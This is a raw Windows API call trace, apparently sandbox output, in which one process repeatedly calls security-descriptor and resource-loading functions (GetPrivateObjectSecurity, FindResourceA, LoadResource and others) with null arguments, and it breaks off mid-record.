0 [0070.011] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.011] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.011] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.011] LockResource (hResData=0x0) returned 0x0 [0070.011] FreeResource (hResData=0x0) returned 0 [0070.011] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.011] LockResource (hResData=0x0) returned 0x0 [0070.011] FreeResource (hResData=0x0) returned 0 [0070.011] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.011] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.011] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.011] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.011] LockResource (hResData=0x0) returned 0x0 [0070.011] FreeResource (hResData=0x0) returned 0 [0070.011] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.011] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.011] LockResource (hResData=0x0) returned 0x0 [0070.013] FreeResource (hResData=0x0) returned 0 [0070.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.013] LockResource (hResData=0x0) returned 0x0 [0070.013] FreeResource (hResData=0x0) returned 0 [0070.013] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.013] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.013] LockResource (hResData=0x0) returned 0x0 [0070.013] FreeResource (hResData=0x0) returned 0 [0070.013] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.013] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.013] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.013] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.014] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.014] LockResource (hResData=0x0) returned 0x0 [0070.014] FreeResource (hResData=0x0) returned 0 [0070.014] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.014] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.014] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.014] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.015] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.015] LockResource (hResData=0x0) returned 0x0 [0070.015] FreeResource (hResData=0x0) returned 0 [0070.015] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.015] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.015] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.016] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.016] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.016] LockResource (hResData=0x0) returned 0x0 [0070.016] FreeResource (hResData=0x0) returned 0 [0070.016] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.016] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.017] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.017] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.017] LockResource (hResData=0x0) returned 0x0 [0070.017] FreeResource (hResData=0x0) returned 0 [0070.017] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.017] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.018] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.018] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.018] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.018] LockResource (hResData=0x0) returned 0x0 [0070.018] FreeResource (hResData=0x0) returned 0 [0070.018] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.019] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.019] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.019] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.019] LockResource (hResData=0x0) returned 0x0 [0070.019] FreeResource (hResData=0x0) returned 0 [0070.019] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, 